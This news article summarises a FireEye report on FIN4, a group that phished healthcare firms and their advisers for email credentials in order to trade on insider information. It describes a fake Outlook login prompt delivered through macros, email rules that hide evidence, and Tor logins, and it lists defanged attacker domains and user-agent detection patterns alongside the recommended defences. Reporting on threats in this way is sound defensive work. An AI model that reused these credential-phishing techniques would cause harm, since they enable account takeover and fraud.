FireEye researchers released a report (pdf) detailing how Wall Street-savvy attackers have been hacking into email accounts of over 100 companies that deal with financial and sensitive deals in order to glean insider information which can be exploited to affect stock prices. The group, dubbed FIN4, has been active since mid-2013, primarily targeting healthcare and pharmaceutical firms as well as researchers, scientists, lawyers, investment bankers and other companies that would advise such firms. It is believed FIN4 is comprised of native English speakers with a deep understanding of Wall Street and how to make or break stock prices.
Instead of using malware, FIN4 gathers useful insider information by using spearphishing emails that have successfully lured “victims into opening weaponized documents and entering their email credentials.” After hijacking one email account that communicates with another similar firm or advisory company about “market-moving, non-public matters,” FIN4 hijacks the email thread and sends a spearphishing email to the second firm. The FireEye report delves into FIN4’s tactics as well as security measures to help thwart those tactics.
FIN4 uses Visual Basic for Applications (VBA) macros to “embed malicious code into already existing and legitimate company documents. Embedded in each Microsoft Word or Excel document is a malicious macro that prompts the user for their Outlook credentials.” The normal-looking, yet actually malicious, Windows Security prompt indicates “Your Outlook session has expired. Please log in to continue.” The report states, “Many of the fake Outlook windows opened by the macros contain the logo of the company targeted giving the pop-up apparent legitimacy…Only after credentials are entered will the document appear for the user.”
FireEye noted that the “group sends emails with links to fake Outlook Web App (OWA) login pages that will also steal the user’s credentials,” but FIN4 hasn’t used that tactic “in recent months.”
Another FIN4 tactic to avoid detection is to create Microsoft Outlook rules that delete emails containing specific keywords, such as phishing, hacked or malware. The report shows the following example:
70 unique campaigns to steal usernames and passwords have included malicious credential prompts targeting “scientists and research” as well as CEO, CFO, COO and corporate developers. Once the victim enters his or her user credentials, the data is transmitted to the C2 server; FIN4 uses the stolen credentials to login to victim email accounts to access private communications. The compromised account allows attackers to send malicious documents “to targets inside and outside the victim company.”
Not only does FIN4 have a great grasp on how to game the stock market, but the group uses social engineering, such as in the following example provided by the FireEye report.
Figure 4 shows the group’s strong command of an executive’s concerns over illicit public disclosure, particularly over executive incompetence and compensation issues. This email came from an account that FIN4 hijacked at a public company and includes several watchwords: “disclosure” of “confidential company information regarding pending transactions.” These specific issues are key terms at public companies, where the public disclosure of sensitive business information is strictly regulated.
FireEye’s suggested security measures to thwart FIN4 tactics
FireEye recommends disabling VBA macros in Microsoft Office by default and enabling “two-factor authentication of OWA and any other remote access mechanisms.” Additionally, it was advised to block the following nine domains: ellismikepage[.]info, rpgallerynow[.]info, msoutexchange[.]us, outlookscansafe[.]net, outlookexchange[.]net, lifehealthsanfrancisco2015[.]com, dmforever[.]biz, junomaat81[.]us, nickgoodsite.co[.]uk.
Since FIN4 tends to use Tor to log in to victims’ email accounts after obtaining the compromised user credentials, FireEye said to check network logs for OWA logins from known Tor exit nodes, as “legitmate users” do not need Tor to access email. Below are two User Agents that can be "used to identify potentially suspicious OWA activity in network logs when paired with originating Tor IP addresses:"
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
FireEye posted indicators on GitHub that organizations can use to help detect FIN4 activity. One identifies Office documents with the MACROCHECK credential stealer in them. “It can be run against .doc files or VBA macros extracted from .docx files (vbaProject.bin files).” The IOC contains DNS entries that are controlled by the FIN4 group.
FireEye's full report on FIN4 is here (pdf).